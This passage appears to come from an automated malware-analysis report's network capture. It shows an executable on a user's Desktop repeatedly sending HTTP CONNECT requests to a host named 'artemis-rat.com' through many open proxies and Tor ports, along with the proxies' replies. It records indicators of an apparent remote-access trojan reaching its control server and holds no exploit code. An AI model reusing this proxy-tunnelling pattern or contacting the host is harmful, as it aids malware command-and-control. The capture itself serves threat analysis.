User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.811677933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.796539068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.514621973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1061192.168.2.5527615.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.032751083 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1062192.168.2.550848159.112.141.4480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.035974979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.108072042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202241898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.311379910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1063192.168.2.552880172.67.182.169803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.035974979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.190325022 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1064192.168.2.552820211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.037698030 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1065192.168.2.55288223.227.38.198803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.037698984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.192110062 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1066192.168.2.55277238.54.16.97803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.038161039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1067192.168.2.552378115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.038892031 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1068192.168.2.552774202.139.198.1530503876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.040937901 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.476854086 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1069192.168.2.552897104.27.26.29803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.040961027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.195732117 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1070192.168.2.552824162.55.87.4855663876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.043464899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.382395029 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1071192.168.2.552819223.215.177.22880893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.043466091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.565848112 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1072192.168.2.5528181.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.043894053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1073192.168.2.552801106.14.124.29813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.056093931 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.391264915 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1074192.168.2.55289238.54.101.25431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.058655977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.241142988 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1075192.168.2.55298943.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.064790964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1076192.168.2.552825159.223.71.71592433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.066046000 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.806338072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.939340115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.014879942 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202095032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.311523914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405203104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1077192.168.2.55300843.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.074038029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1078192.168.2.55300943.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.076236010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1079192.168.2.552934185.162.228.170803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.076240063 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.232664108 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1080192.168.2.552923162.159.242.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.076555014 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.239352942 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1081192.168.2.55301043.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.077754021 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1082192.168.2.55292550.63.12.33507813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.080882072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.635445118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.217727900 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.311459064 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405622959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.487530947 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.608329058 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.905105114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1083192.168.2.552886162.241.158.204317943876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.081010103 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.635632038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.355353117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.694957972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.202255964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1084192.168.2.552809182.78.42.112823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.093067884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.905057907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.092787981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405407906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.889580011 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1085192.168.2.55289445.196.148.854323876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.107762098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.326488972 CET | 308 | IN | HTTP/1.1 407 Proxy Authentication Required
Server: FaaS v1.3-20220203-7fa38bd5af
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 65
Proxy-Authenticate: Basic realm="Proxy"
Connection: close
Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1086192.168.2.55096351.158.108.165163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.109024048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.238643885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.311383963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.311541080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1087192.168.2.55283045.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.115401030 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1088192.168.2.55287047.93.121.200803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.116410971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.434758902 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
